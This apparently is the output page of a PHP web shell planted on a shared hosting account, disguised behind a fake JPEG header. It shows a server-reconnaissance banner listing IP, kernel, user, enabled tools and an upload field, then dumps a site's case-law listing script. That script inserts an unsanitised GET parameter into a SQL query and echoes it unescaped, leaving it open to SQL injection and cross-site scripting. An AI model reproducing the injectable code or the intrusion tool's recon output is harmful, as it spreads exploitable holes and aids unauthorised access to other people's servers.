ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.73 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/www/ |
Upload File : |
<?php $id=$_GET['tax']; ?> <?php include "head.php"; include "admin/db.php"; $p2="SELECT * FROM `cases` WHERE `Catag`= '$id' ORDER BY `Year` DESC;"; $power = mysqli_query($con,$p2); ?> <!--<Style>--> <!-- .form-control:focus {--> <!-- color: #212529;--> <!-- background-color: #fff;--> <!-- border-color: #b7d0f5;--> <!-- outline: 0;--> <!-- box-shadow: 0 0 0 0.25rem rgba(79, 80, 80, 0.247);--> <!--}--> <!-- .btn-primary{ background: #009bad;--> <!-- border: #0a9eb0;}--> <!-- .btn:hover {--> <!-- color: var(--bs-btn-hover-color);--> <!-- background-color: #98a0a4;--> <!-- border-color: #98a0a4;--> <!--}--> <!-- .head{width: 100%;height: 200px; --> <!-- background-color: #ebebebf7;}--> <!-- .head img{width: 300px;}--> <!--.img1st{margin: 0% 37%;--> <!-- padding-top: 62px;}--> <!--td{text-align: justify;--> <!-- }--> <!-- th{text-align: center; color: #666666;--> <!-- }--> <!-- #viewpower input{ display: none;}--> <!--</Style>--> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title><?php echo $id ?> (Case Laws)</title> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.13.4/css/jquery.dataTables.min.css"> </head> <body> <script type="text/javascript" src="https://code.jquery.com/jquery-3.5.1.js"></script> <script type="text/javascript" src="https://cdn.datatables.net/1.13.4/js/jquery.dataTables.min.js"></script> <script type="text/javascript"> $('#example').DataTable({ }); </script> <style type="text/css"> input{ border: 1px solid #aaaaaa; height: 28px; border-radius: 5px; width: 92%; outline: none; padding: 1px 7px;} </style> <h1><?php echo$id;?> (<span style="color: #777777;">Case Laws</span>) </h1> <table id="example" class="display" style="width:100%"> <thead> <tr> <th class="powerpeti">Court </th> <th id="yearpower">Year</th> <th class="powerpeti">Petitioner</th> <th class="powerpeti">Law/Section</th> <th class="powerpeti">Topic</th> <th class="powerpeti">Case Law </th> <th class="powerpeti">Citation/Ref.</th> <th id="viewpower">View</th> </tr> </thead> <tbody> <?php foreach ($power as $k ) { ?> <tr> <td ><?php echo $k['Court'];?></td> <td ><?php echo $k['Year'];?></td> <td class="" ><?php echo $k['Vs1'];?><br> <B>Vs</B><br> <?php echo $k['Vs2'];?></td> <td > <?php echo $k['Law'];?> <?php echo $k['Sections'];?></td> <td ><?php echo $k['Topic'];?></td> <td ><p style="text-align:justify;"><?php $desc=$k['Para']; $StrCut=substr($desc,0,270); $desc =substr($StrCut,0,strrpos($StrCut,' '))."<a href='viewreport?id=$k[ID]'> Read More...</a>"; echo $desc; ?></p></td> <td ><?php echo $k['Ref'];?></td> <td ><a href="viewreport?id=<?php echo $k['ID'];?>"><button class="btn btn-primary" style="width: 100%; height: 100%;">View</button></a></td> </tr> <?php } ?> </tfoot> </table> </body> </html> <script type="text/javascript"> $(document).ready(function () { // Setup - add a text input to each footer cell $('#example thead tr') .clone(true) .addClass('filters') .appendTo('#example thead'); var table = $('#example').DataTable({ orderCellsTop: true, fixedHeader: true, order: [[1, 'desc']], initComplete: function () { var api = this.api(); // For each column api .columns() .eq(0) .each(function (colIdx) { // Set the header cell to contain the input element var cell = $('.filters th').eq( $(api.column(colIdx).header()).index() ); var title = $(cell).text(); $(cell).html('<input type="text" placeholder="' + title + '" />'); // On every keypress in this input $( 'input', $('.filters th').eq($(api.column(colIdx).header()).index()) ) .off('keyup change') .on('change', function (e) { // Get the search value $(this).attr('title', $(this).val()); var regexr = '({search})'; //$(this).parents('th').find('select').val(); var cursorPosition = this.selectionStart; // Search the column for that value api .column(colIdx) .search( this.value != '' ? regexr.replace('{search}', '(((' + this.value + ')))') : '', this.value != '', this.value == '' ) .draw(); }) .on('keyup', function (e) { e.stopPropagation(); $(this).trigger('change'); $(this) .focus()[0] .setSelectionRange(cursorPosition, cursorPosition); }); }); }, }); }); </script>